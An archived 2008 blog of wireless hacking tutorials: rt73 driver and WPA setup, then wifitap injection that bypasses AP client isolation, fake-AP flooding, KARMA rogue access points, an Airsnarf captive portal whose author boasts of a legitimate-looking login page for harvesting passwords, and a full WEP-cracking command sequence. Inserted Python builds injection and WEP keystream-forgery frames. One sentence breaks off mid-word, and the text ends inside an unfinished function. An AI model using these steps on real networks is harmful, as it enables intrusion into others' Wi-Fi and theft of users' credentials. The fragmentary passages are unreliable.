Archive for July, 2008

Look at the BackTrack HCL wiki to find out which cards use the rt73 chipset.

Tested on a Linksys WUSB54GC, which is rt73 based.

There is a new update for rt73 chipset based cards; first download the latest modules.

Working with wpa_supplicant, you have two options:
patch wpa_supplicant for the legacy rt73 driver, or
use the next-generation rt2x00 driver, which works with an unpatched wpa_supplicant.
The latest rt73 modules also have built-in private ioctls that let you set WPA/WPA2 parameters from the shell, wpa_supplicant-style, without either.

OK, we begin.
Extract the archive, then:

ifconfig rausb0 down
modprobe -r rt73
cd rt73-k2wrlz-3.0.1/module
make && make install

modprobe rt73 ifname=wlan0
(ifname= sets the interface name; choose whatever you like, such as wlan0, rausb0 or eth1, and use the same name in all the commands below)

Now use iwpriv to list the private ioctls the module exposes:

bt ~ # iwpriv wlan0
wlan0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
txpower (8BF3) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BEF) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BF1) : set 1024 char & get 0
forceprism (8BF2) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 0
get_rfmontx (8BED) : set 0 & get 1 int
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0

You can see that we got options like txpower, wpapsk, auth and enc to modify the settings without any external tool.

If you want to raise the transmit power, reload the module with the txPowerTuning parameter:
ifconfig wlan0 down
modprobe -r rt73
modprobe rt73 txPowerTuning=36 ifname=wlan0
Remember: this value is ADDED to the default power stored in the card's EEPROM; it is not an absolute setting.
Valid values for txPowerTuning: -6 to 36 (0xFA to 0x24 as a signed byte). Check that the resulting output stays within what your local regulator allows on the band you use.
I set it on my Linksys WUSB54GC to 36 without problem.
Now bring the interface up (ifconfig wlan0 up) and run iwconfig:

it will show the USB NIC as the newly created wlan0.

use airodump-ng wlan0

You will get a much higher PWR than before. I got an amazing 90 to 110.

Now you have two ways to work with WPA/WPA2 networks:
either use the latest rt2x00 driver from serialmonkey together with wpa_supplicant, as already said, or configure the wlan0 USB NIC directly through the private ioctls as follows.

b) WPA-PSK (TKIP)

wpa_passphrase <essid> <passphrase>
copy the 64-hex psk= value (the uncommented one)
iwconfig wlan0 mode managed
iwconfig wlan0 essid <essid>
iwpriv wlan0 set AuthMode=WPAPSK
iwpriv wlan0 set EncrypType=TKIP
iwpriv wlan0 set WPAPSK=<key> #replace key with the 64-hex psk from wpa_passphrase

c) WPA2-PSK (802.11i, AES-CCMP)
wpa_passphrase <essid> <passphrase>
copy the 64-hex psk= value (the uncommented one)
iwconfig wlan0 mode managed
iwconfig wlan0 essid <essid>
iwpriv wlan0 set AuthMode=WPA2PSK
iwpriv wlan0 set EncrypType=AES
iwpriv wlan0 set WPAPSK=<KEY> #replace key with the 64-hex psk from wpa_passphrase

(EncrypType is the driver's own spelling, not a typo. If association does not come up, check the order: ESSID, AuthMode and EncrypType first, WPAPSK last.)

Check that you are associated with an AP:
iwconfig wlan0
(the Access Point field shows the AP's BSSID instead of Not-Associated)

If you want to use wpa_supplicant with the legacy rt73 driver you need to patch wpa_supplicant itself.
Download wpa_supplicant and the patch files (see the download link), then:

tar xzf wpa_supplicant-0.5.7.tar.gz
cd wpa_supplicant-0.5.7
patch -p1 < wpa_supplicant-ralink_rt73.patch
patch -p1 < wpa_supplicant-ralink_rt73-fix.patch
# build as usual: cp defconfig .config, enable the driver backend the patch provides in .config, make
# then install, e.g.
cp wpa_cli wpa_supplicant /usr/local/bin

Configure using wpa_supplicant (other users looking for a wpa_supplicant config can try this too).

Use these commands:

wpa_passphrase <essid> <passphrase>
bt ~ # wpa_passphrase thunderbolt backtrack3
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149bd2f42e42e631bedb0
copy the psk value (it is the 256-bit pre-shared key derived from passphrase and ESSID, not a hash of the passphrase alone, so it changes when the ESSID changes)

For configuring wpa_supplicant:
nano /etc/wpa_supplicant.conf

Edit it. The settings must sit inside a network={ ... } block, otherwise wpa_supplicant rejects the file:
# WPA protected network, supply your own ESSID and PSK here:
network={
    scan_ssid=0
    # set scan_ssid=1 if the SSID is hidden
    ssid="thunderbolt"
    # change to your ssid/essid
    key_mgmt=WPA-PSK
    pairwise=CCMP TKIP
    group=CCMP TKIP WEP104 WEP40
    psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149bd2f42e42e631bedb0
    # change the psk to the one you got from wpa_passphrase
}
Keep the file readable by root only (chmod 600 /etc/wpa_supplicant.conf): the psk value gets you onto the network exactly like the passphrase does.
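To see what wpa_passphrase actually produces, here is an added example of mine (not code from this post and not wpa_supplicant's code): the psk= line is PBKDF2-HMAC-SHA1 over the passphrase, with the ESSID as salt, 4096 iterations, 32 bytes, as IEEE 802.11i defines it. The function names and the rendering of the network block are my own choices; the ss

```python
# Added example, not code from the post or from wpa_supplicant.
# The 64 hex characters wpa_passphrase prints are the WPA/WPA2 pre-shared
# key (the PMK): PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)
# per IEEE 802.11i. Function names and the config rendering are my own.
import hashlib


def wpa_psk(ssid: str, passphrase: str) -> bytes:
    """Derive the 256-bit PSK the way wpa_passphrase does."""
    # 802.11i limits passphrases to 8..63 characters; wpa_passphrase
    # refuses anything else, so do the same.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def network_block(ssid: str, passphrase: str, hidden: bool = False) -> str:
    """Render the wpa_supplicant.conf network block for this network, in the
    same shape wpa_passphrase prints it (the #psk line is a comment; leave it
    out of the file on shared machines)."""
    lines = [
        "network={",
        f'\tssid="{ssid}"',
        f'\t#psk="{passphrase}"',
        f"\tpsk={wpa_psk(ssid, passphrase).hex()}",
        "\tkey_mgmt=WPA-PSK",
    ]
    if hidden:
        lines.append("\tscan_ssid=1")   # needed for APs that hide the SSID
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Same arguments as the wpa_passphrase call shown in the post.
    print(network_block("thunderbolt", "backtrack3"))
```

Because the ESSID is the salt, a psk= line copied from another network's config is useless even when the passphrase is the same, which is why wpa_passphrase needs the ESSID; and because anyone who reads the psk= line can join the network, the config file deserves the same protection as the passphrase.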

Now connect to the WPA/WPA2-enabled AP using:

bt ~ # wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf -D rt73 -w
(-D with a capital D selects the driver backend, here the one the patch registers; lowercase -d only raises the debug level. -w waits for the interface if it is not there yet. Other users may change the interface to ath0, wifi0, etc.)

Trying to associate with 00:21:29:68:16:c2 (SSID='thunderbolt' freq=2462 MHz)

Associated with 00:21:29:68:16:c2
WPA: Key negotiation completed with 00:21:29:68:16:c2 [PTK=TKIP GTK=TKIP]
CTRL-EVENT-CONNECTED - Connection to 00:21:29:68:16:c2 completed (auth) [id=0 id_str=]

Here you are done configuring txpower for the new rt73 module and WPA/WPA2. I hope you all liked these little hardware hacks and configs.

Wifitap is a proof of concept for communication over WiFi networks using traffic injection:
direct communication without association.

Wifitap allows direct communication with a station associated to a given access point, meaning:

* we are not associated ourselves;
* we are not handled by the access point (our frames go straight to the station with the AP's BSSID as sender, and the station's replies are read off the air).

airmon-ng start ath0
airmon-ng start wifi0
airmon-ng start wifi0
(Now you have 3 ath interfaces: ath0, ath1 and ath2; each airmon-ng start wifi0 creates a new monitor-mode VAP on the madwifi card.)

airodump-ng ath1
Note the BSSID of your AP.
Wifitap is now ready to be launched to communicate with the stations associated to that access point.

cd /pentest/wireless/wifitap

modprobe tun (wifitap needs the tun/tap device to create the interface we talk through)

bt wifitap# ./wifitap.py -b 00:21:29:68:16:C2 -o ath2 -i ath2
(-b is the target BSSID, -o the interface frames are injected on and -i the one they are captured on. Launching wifitap creates a tuntap interface named wj0 through which we can send regular IP traffic.)

Assign an IP address to the wj0 interface:
bt~# ifconfig wj0 <ip address>
(Most home routers use the 192.168.1.x segment, so you can safely use any address in it that the router and its clients do not already use.)

Now we can reach the network through wj0. Start listening on the ath2 interface to discover associated stations and communicate with them over IP:

bt~# tcpdump -vvv -i ath2

NB: the wj0 MAC address is used as source of the sent frames unless you provide one with -s <SMAC>.

bt ~ # route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
(the address columns were lost from the archived page; the four routes are: the eth0 subnet, flags U, eth0; the wj0 subnet, flags U, wj0; loopback, flags U, lo; and the default route, flags UG, eth0)

bt ~ # ping (the target address was lost from the archived page)
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.045 ms
64 bytes from icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from icmp_seq=3 ttl=64 time=0.035 ms
64 bytes from icmp_seq=4 ttl=64 time=0.040 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.035/0.039/0.045/0.004 ms

You have successfully set up a connection to the router's network. Wifitap allows any application to send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply by configuring wj0, which means:

* setting an IP address consistent with the target network's address range;
* routing the desired traffic through it.

In particular, it is a cheap method for injecting arbitrary packets in 802.11 frames without a specific library.

In addition, it lets one get rid of any limitation set at the access-point level, such as inter-client communication prevention (e.g. Cisco PSPF) or reaching multiple SSIDs handled by the same access point: the injected frames reach the station directly with the AP's BSSID as sender, so the AP's own filtering never sees them.
Wifitap can easily be modified to serve as a framework for simple tasks such as injecting answers to captured frames.

If you want to use Scapy for parsing captured packets and generating answers, you need to import the related classes. For instance, if you want to work on ICMP packets, just add:

from scapy import IP, ICMP

Then you have to rip out the tuntap interface handling:

* initialisation;
* reading;
* writing.

Finally, you have to modify the main loop to handle identification of interesting frames, field parsing, then answer generation and injection.

Wifitap contains sample programs:

* ARP request answering machine (wifiarp.py);
* DNS request answering machine (wifidns.py);
* ICMP Echo Request answering machine (wifiping.py).
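To make the "not associated, not handled by the AP" point concrete, here is an added example of mine showing the 802.11 framing wifitap relies on. It is not wifitap's own code and uses no scapy, so it runs offline; the station MACs, IP addresses and the ICMP packet are constructed test data, only the BSSID is the one from this post, and the function names are my own.

```python
# Added example, not wifitap's own code: the 802.11 framing behind the post.
# wifitap never associates and never goes through the AP. It injects data
# frames that look like they come FROM the AP (FromDS=1, addr2=BSSID) straight
# to the target station, and reads the station's replies off the air as they
# go TO the AP (ToDS=1, addr1=BSSID). Pure struct, no scapy, so it runs
# offline. The MAC addresses and the ICMP packet below are constructed test
# data; only the BSSID is the one from the post.
import struct

FC_DATA = 0x08                                  # frame control byte 0: type data, subtype 0
TO_DS, FROM_DS, PROTECTED = 0x01, 0x02, 0x40    # frame control byte 1 flags
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")
BROADCAST = b"\xff" * 6
HDR = "<BBH6s6s6sH"                             # fc0, fc1, duration, addr1, addr2, addr3, seqctl


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def encap_ip(ip_pkt: bytes, bssid: bytes, smac: bytes, dmac: bytes, seq: int = 0) -> bytes:
    """Wrap an IPv4 packet the way wifitap injects it: a FromDS data frame, so
    the station sees addr1=itself, addr2=its AP, addr3=the sender (our wj0
    MAC). No FCS here; the injecting driver appends it."""
    hdr = struct.pack(HDR, FC_DATA, FROM_DS, 0, dmac, bssid, smac, (seq & 0xFFF) << 4)
    return hdr + LLC_SNAP_IPV4 + ip_pkt


def station_accepts(frame: bytes, sta_mac: bytes, bssid: bytes) -> bool:
    """What an associated client checks before passing a data frame up the
    stack: FromDS set, sent by its BSSID, addressed to it or to broadcast.
    The AP's association table and client isolation are never consulted,
    which is why the injection works."""
    fc0, fc1, _, a1, a2, _, _ = struct.unpack_from(HDR, frame)
    return (fc0 & 0x0C == 0x08 and fc1 & (FROM_DS | TO_DS) == FROM_DS
            and a1 in (sta_mac, BROADCAST) and a2 == bssid)


def decap_ip(frame: bytes, bssid: bytes, our_mac: bytes):
    """Unwrap a reply: a ToDS data frame from a station to the AP whose final
    destination (addr3) is our wj0 MAC or broadcast. Returns
    (src_mac, dst_mac, ip_pkt), or None for frames wifitap would drop."""
    if len(frame) < 24 + 8:
        return None
    fc0, fc1, _, a1, a2, a3, _ = struct.unpack_from(HDR, frame)
    if fc0 & 0x0C != 0x08 or fc1 & (TO_DS | FROM_DS) != TO_DS:
        return None
    if fc1 & PROTECTED:             # WEP traffic: wifitap needs the key (-w) for this
        return None
    if a1 != bssid or a3 not in (our_mac, BROADCAST):
        return None
    off = 26 if fc0 & 0x80 else 24  # QoS data frames carry 2 extra header bytes
    if frame[off:off + 8] != LLC_SNAP_IPV4:
        return None
    return a2, a3, frame[off + 8:]


def station_frame(ip_pkt: bytes, sta_mac: bytes, bssid: bytes, dmac: bytes, seq: int = 0) -> bytes:
    """Constructed client reply (ToDS) for testing: addr1=BSSID, addr2=SA, addr3=DA."""
    hdr = struct.pack(HDR, FC_DATA, TO_DS, 0, bssid, sta_mac, dmac, (seq & 0xFFF) << 4)
    return hdr + LLC_SNAP_IPV4 + ip_pkt


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones' complement checksum, used for the IP and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo(src_ip: str, dst_ip: str, ident: int = 1, seq: int = 1) -> bytes:
    """Constructed IPv4 + ICMP echo request, what `ping` through wj0 emits."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + b"wifitap"
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    src = bytes(int(o) for o in src_ip.split("."))
    dst = bytes(int(o) for o in dst_ip.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp
```

The PSPF bypass follows directly from station_accepts: the client only checks that the frame carries its BSSID as sender, so anything we inject with that BSSID is delivered, and the AP, which is where the isolation policy lives, is never in the path. The PROTECTED check in decap_ip is the reason wifitap has a -w option: on a WEP network the same trick works, but the frames have to be decrypted and encrypted with the key first.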

As I got the script working with my card, I noticed that it was quite effective at throwing a lot of trash onto the 802.11 spectrum. You could quickly fill up a NetStumbler, Kismet or airodump screen with random stuff. However, if the purpose was to make it appear as if the area was filled with access points


* A card working with the MadWifi drivers. There are some specific commands (wlanconfig) that will need to be changed if you are going to adapt this for other cards/drivers.
* A card that supports Master or AP mode. This allows it to function, or appear, as an access point to wireless clients.
* The Time::HiRes Perl module. [OPTIONAL] This is available from CPAN and allows you to specify sleep times in sub-second increments. Not needed if you are happy with whole-second delays.
* The Getopt::Long Perl module. This is available from CPAN and is required for processing the command line arguments passed to airraid.
* macchanger. This is a very handy little utility. It is available here or from various other places. There are many binaries already compiled. It is required to effectively change the MAC address of the wireless card.
* Linux or some form of *nix. Of course.
* Root (superuser) access. I don't know this for a fact but I suspect you need to be root to run some of the ifconfig and iwconfig commands.

cd /pentest/wireless/airraid-0.1/
Make some modifications to groupfile-example.dat and put some AP details in it, one per line, in the following format:
bssid,essid,WEP y/n,channel
For example I entered:

Save and close it.

Edit the my @words = (...) line and put these strings at the end; the ESSIDs of the generated APs are picked at random from this list:
my @words = ( "Access Point", "tsunami", "host", "airport", "linksys", "Netgear", "Cisco", "Wireless", "2wire", "intel", "WLAN", "thunderbolt", "UTStarcom", "beetel", "Ubiquiti", "wifi0wn", "PRAVEEN" );

Run the script with: --interface ath0

This is about as simple as you can go. This will generate fully random (wireless) MAC addresses, no WEP (open), full power, use a random assortment of the built-in default ESSIDs, sleep for the default (0.6 sec) between generations, and use all available channels. The MACs will, in all likelihood, almost never be repeated, so any scanner will see a nearly infinite number of APs if it watches long enough. For testing I monitored with another wireless interface:

bt~# airodump-ng rausb0
(Check that all the fake APs show encryption type OPN.)

Run the script with: --interface ath0 --power 20 --wep 1

This one creates a bit more variety on the airwaves. This will generate fully random (wireless) MAC addresses, randomly assign WEP keys to all of the APs, vary power between 0 mW and 20 mW (or the max of the card), use a random assortment of the built-in default ESSIDs and use all available channels. Similar to the example above, this will create a nearly infinite number of APs. For testing it use:

bt~# airodump-ng rausb0
(Check that all the fake APs now show encryption type WEP.)

Run the script with: --interface ath0 --power 20 --gf groupfile-example.dat

My personal favorite. This will vary power between 0 mW and 20 mW (or the max of the card) but pull all other information from the groupfile called groupfile-example.dat, which contains all the information necessary to create n bogus APs. This will cycle through these n APs in random order, sending out beacons.

bt~# airodump-ng rausb0
(Check that the fake APs now beacon in random order and look like real APs: fixed BSSID, ESSID and channel taken from the groupfile.)


Project homepage:

"KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host."

First of all install the latest madwifi snapshot from here:

bt ~# tar -zxvf madwifi-trunk-r3813-20080720.tar.gz

bt ~# cd madwifi-trunk-r3813-20080720

bt ~# make && make install

bt ~# ln -s /sbin/iwconfig /usr/sbin/iwconfig
bt ~# ln -s /sbin/iwpriv /usr/sbin/iwpriv
bt ~# ln -s /sbin/iwevent /usr/sbin/iwevent
bt ~# airmon-ng start ath0
bt ~# airmon-ng start wifi0

Putting the card into master (AP) mode (the VAP created below is an access point, not a monitor interface):

bt ~# wlanconfig ath0 destroy

bt ~# wlanconfig ath0 create wlandev wifi0 wlanmode master

Go to the karma directory.

karma.xml: "Runs a rogue base station with DHCP, DNS and HTTP services. The HTTP service redirects all requests to the ExampleWebExploit module that displays a simple HTML page. This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc."

bt karma# bin/ ath0

bt karma# (cd ./src/ && make) && ./src/karma ath0

bt karma# bin/karma etc/karma.xml

Now the rogue services are started; any probing client will connect to KARMA on our machine, whichever SSID its machine chooses to probe for.

iwconfig output shows ath0 working as the rogue AP; we can see the BSSID of the rogue AP.

We can see our fake AP is working now and broadcasting its BSSID, and other clients probing for their legitimate AP automatically connect to our rogue AP.

karma-scan.xml: "Attempts to find insecure wireless clients that will associate to a rogue network and possibly obtain an IP address via DHCP."

bt karma# bin/karma etc/karma-scan.xml

This tool has a layered attack approach. I am still working on it so that we can launch more attacks, like Nmap scanning and Metasploit to exploit known vulnerabilities.
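Both the fake-AP script above (random BSSIDs and ESSIDs, OPN or WEP) and KARMA (answering a client's probe for any SSID) come down to management frames the card sends. Here is an added example of mine, not code from either tool, that builds and parses those frames without a radio: a beacon as airodump-ng would see it, and a probe response that claims exactly the SSID a client probed for. It runs offline; every MAC, SSID and channel in it is constructed, and the function names are my own.

```python
# Added example, not code from the fake-AP script or from KARMA. It shows, at
# the frame level, the two things the tools above do: beacon a made-up network
# (random locally-administered BSSID, chosen ESSID, channel, OPN or WEP
# capability), and answer a client's directed probe request with a probe
# response for whatever SSID it asked for, which is how KARMA catches clients
# that probe for their remembered networks. Pure struct, runs offline; every
# MAC and SSID below is constructed.
import os
import struct

FC_BEACON, FC_PROBE_REQ, FC_PROBE_RESP = 0x80, 0x40, 0x50   # management subtypes 8, 4, 5
BROADCAST = b"\xff" * 6
IE_SSID, IE_RATES, IE_DS = 0, 1, 3                        # information element tags
CAP_ESS, CAP_PRIVACY = 0x0001, 0x0010                     # capability bits: AP, WEP/WPA
RATES_BG = bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])  # 1,2,5.5,11 basic; 6,9,12,18
HDR = "<BBH6s6s6sH"                                       # fc0, fc1, duration, addr1, addr2, addr3, seqctl


def mgmt_header(fc0: int, dst: bytes, src: bytes, bssid: bytes, seq: int = 0) -> bytes:
    return struct.pack(HDR, fc0, 0, 0, dst, src, bssid, (seq & 0xFFF) << 4)


def ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


def random_bssid(rng=os.urandom) -> bytes:
    """Random unicast, locally administered MAC (what macchanger -r hands the
    script): set the local bit, clear the multicast bit of the first byte."""
    b = bytearray(rng(6))
    b[0] = (b[0] | 0x02) & 0xFE
    return bytes(b)


def beacon(bssid: bytes, ssid: str, channel: int, wep: bool, seq: int = 0) -> bytes:
    """One beacon frame as a fake AP would emit it. The timestamp is left at
    zero because the radio fills it in at transmit time."""
    cap = CAP_ESS | (CAP_PRIVACY if wep else 0)
    body = struct.pack("<QHH", 0, 100, cap)          # timestamp, interval (TU), capability
    body += ie(IE_SSID, ssid.encode()) + ie(IE_RATES, RATES_BG) + ie(IE_DS, bytes([channel]))
    return mgmt_header(FC_BEACON, BROADCAST, bssid, bssid, seq) + body


def parse_ies(body: bytes) -> dict:
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def beacon_info(frame: bytes):
    """What airodump-ng shows per beacon or probe response:
    (BSSID, ESSID, channel, privacy flag: True means WEP/WPA, False means OPN)."""
    if len(frame) < 36 or frame[0] not in (FC_BEACON, FC_PROBE_RESP):
        return None
    _, _, _, _, _, bssid, _ = struct.unpack_from(HDR, frame)
    _ts, _interval, cap = struct.unpack_from("<QHH", frame, 24)
    ies = parse_ies(frame[36:])
    ssid = ies.get(IE_SSID, b"").decode(errors="replace")
    return bssid, ssid, ies.get(IE_DS, b"\x00")[0], bool(cap & CAP_PRIVACY)


def parse_probe_request(frame: bytes):
    """Return (station MAC, probed SSID) or None. An empty SSID is a wildcard
    probe; a named one leaks a network the client remembers and trusts."""
    if len(frame) < 24 or frame[0] != FC_PROBE_REQ:
        return None
    _, _, _, _, src, _, _ = struct.unpack_from(HDR, frame)
    ssid = parse_ies(frame[24:]).get(IE_SSID, b"")
    return src, ssid.decode(errors="replace")


def karma_probe_response(frame: bytes, bssid: bytes, channel: int, seq: int = 0):
    """Answer a directed probe request with a probe response claiming exactly
    the SSID the station asked for, as an open network. Wildcard probes get
    nothing here; beacons cover those."""
    parsed = parse_probe_request(frame)
    if parsed is None or parsed[1] == "":
        return None
    sta, ssid = parsed
    body = struct.pack("<QHH", 0, 100, CAP_ESS)
    body += ie(IE_SSID, ssid.encode()) + ie(IE_RATES, RATES_BG) + ie(IE_DS, bytes([channel]))
    return mgmt_header(FC_PROBE_RESP, sta, bssid, bssid, seq) + body


def probe_request(sta: bytes, ssid: str) -> bytes:
    """Constructed client probe request, for the test only."""
    return (mgmt_header(FC_PROBE_REQ, BROADCAST, sta, BROADCAST)
            + ie(IE_SSID, ssid.encode()) + ie(IE_RATES, RATES_BG))
```

The OPN/WEP column airodump-ng shows for the fake APs is nothing more than the privacy bit in the capability field, which is why the --wep 1 run of the script changes it without any real key being used. The KARMA half answers only directed probes, because a probe for a named network is the client telling us which SSID it will join; a client that remembers an open network and probes for it gets a probe response for that name and, as the post describes, associates on its own.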

Most probably you people won't trust the point that a Linux machine can act as an access point, but it's true. Atheros chipset based cards can act as an access point (master mode). I have tested it on BackTrack 3 final using a Netgear WG311T A/G/N AR2414 chipset card
(patched madwifi-ng drivers) with a 7 dBi antenna and a Linksys WUSB54GC (RT73 chipset). The Netgear PCI card I made the rogue AP, and through my other card I scanned the available APs and got the rogue AP working in OPN authentication mode. Voila.
Use this command to check that your card can do what Airsnarf needs:

wlanconfig ath0 create wlandev wifi0 wlanmode master/ap    #use either master or ap

This command makes the wireless NIC act as an AP.

I have attached a custom-coded set of files which gives airsnarf a truly legitimate-looking login page. Download it and unzip it.

#replace the file airsnarf.cfg in /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg

#For the wireless interface I would recommend Atheros chipset based cards, as airsnarf
tries to turn the NIC into an access point, which is possible with the MADWIFI-NG drivers only,
and those are for Atheros based chipsets.

#place dhcpd.src in /pentest/wireless/airsnarf-0.2/bin

#replace airsnarf.cgi in /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi

#replace index.html with mine in /pentest/wireless/airsnarf-0.2/cfg/html and /var/www/htdocs

#replace airsnarf.jpg with my airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html and /var/www/htdocs

#copy apache_pb22_ani.gif from /var/www/htdocs and paste it in /pentest/wireless/airsnarf-0.2/cfg/html.

#that is all we have done: made a legitimate-looking web page for the login.

#cd /pentest/wireless/airsnarf-0.2 and start the airsnarf script
(passwords will be stored in /tmp/airsnarf_pwds.txt)

Setting the rogue AP name to wifi0wn, the DHCP network ID and the router IP.

Starting the Airsnarf script to work as a rogue AP. Great tool for showing the vulnerabilities in the Windows connection manager.

With my other USB wireless NIC, the Linksys WUSB54GC, I am scanning the available networks, where I can see my fake AP is also working, by the name wifi0wn, with open authentication, 54 Mbps and on channel 1.

Now with my other card I am trying to get an IP from wifi0wn and connect without any key.

You can see that ath0 is working as an access point with a random MAC and my rausb0/Linksys adapter got connected with the rogue AP.

In ifconfig we can see that rausb0 got an IP address from Airsnarf's rogue DHCP server.

Now when you surf you will get a login page with a totally legitimate look; thanks to me for coding it and the redirection.

Redirection of the URL after capturing username and password.

The default location of the passwords is /tmp/airsnarf_pwds.txt.

List of usernames along with passwords.

This tool is still in progress. I am making it do nastier things, like redirecting to some website or XSS. Use it for social engineering and vulnerability assessment: you can show that an unaware user can connect to a fake AP without their knowledge, which can lead to compromise of their data. Once they connect to the AP you can run an Nmap scan along with the Metasploit Framework, sniffers like Wireshark for getting HTTP, HTTPS, FTP, TELNET passwords and many more sophisticated attacks. (USE FOR PT & VA ONLY)

What if no client is associated with the AP and you are getting no data packets? In such cases a deauth does not help, because there is nobody to deauthenticate and no ARP traffic to replay. Here is how to do the attack.

airodump-ng wifi0
#note the BSSID and channel of the AP and press ctrl+c
airodump-ng -c 11 -w thunderbolt --bssid 00:21:29:68:16:C2 rausb0
#-c channel on which the AP is working
#-w prefix of the capture file
#--bssid MAC of the AP
#last argument: the monitor-mode interface (ath0, wifi0, wlan0, rausb0, ...)

Keep this window running and open a new terminal.

aireplay-ng -1 0 -e thunderbolt -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 rausb0

#-1 0 fake authentication, done once (0 seconds re-association delay)

#-e ESSID, the Extended Service Set Identifier or network name

#-a BSSID (MAC of the AP)

#-h MAC of our wireless device; the AP must accept frames from this address, since everything below is injected from it

Got authenticated and associated with the AP.

aireplay-ng -4 -h 00:21:29:65:38:42 -b 00:21:29:68:16:C2 rausb0

#-4 is the KoreK chopchop attack (the ARP request replay is -3). With no client there is no ARP traffic to replay, so chopchop takes one captured data packet and decrypts it byte by byte without knowing the key, using the AP as an oracle; the recovered keystream goes to a replay_dec-*.xor file

#-h MAC address of our wireless device (the one fake-authenticated above)

#-b BSSID or MAC of the AP

The replay attack in action, see the AP: the data packets are increasing super fast. Wonderful.

Copy the name of the .xor file that aireplay-ng prints when this command has fully executed.

packetforge-ng -0 -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 -k -l -y replay123456.xor -w arp-request

#-0 forge an ARP request; -k and -l take the destination and source IP (the values did not survive the archive; aircrack-ng's own tutorial uses 255.255.255.255 for both when the network's addresses are unknown); -y the .xor keystream file from chopchop; -w the output file

#packetforge-ng encrypts the forged ARP request with that keystream under the same IV, so the AP accepts it without us ever knowing the key

aireplay-ng -2 -h 00:21:29:65:38:42 -r arp-request rausb0

#-2 interactive replay of the forged packet: the AP re-broadcasts every injected ARP request re-encrypted with a fresh IV, and those IVs land in the airodump-ng capture file for cracking

aircrack-ng -n 128 -z -f 1 -e thunderbolt -b 00:21:29:68:16:C2 thunderbolt*.cap

#-n WEP key length in bits, e.g. 64, 128, 256
#-z PTW attack, which needs far fewer IVs than the default FMS/KoreK attacks; -f fudge factor

#the .cap files are the captures written by the airodump-ng -w command above.

We got the key, decrypted 100% correctly.
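Why does a .xor file from chopchop let packetforge-ng build a packet the AP accepts, when nobody knows the key yet? Here is an added example of mine, not code from aircrack-ng, that works through it: WEP is RC4 keyed with IV||key plus a CRC-32 ICV, so a known plaintext gives the keystream for that IV, and the keystream forges any shorter packet under the same IV. The key, IV, addresses and packets are constructed; the function names are my own.

```python
# Added example, not code from aircrack-ng: why a keystream recovered by
# chopchop (the .xor file) lets packetforge-ng build a valid packet with no
# key. WEP encrypts each frame with RC4 keyed by IV||key and appends a CRC-32
# ICV, so ciphertext XOR known plaintext reveals the keystream for that IV,
# and any new plaintext no longer than it, XORed with the same keystream under
# the same IV, passes the AP's ICV check. Key, IV and packets are constructed.
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream; WEP keys it with the 3-byte IV followed by the secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV(3) || key index(1) || RC4(IV||key, plaintext || ICV)."""
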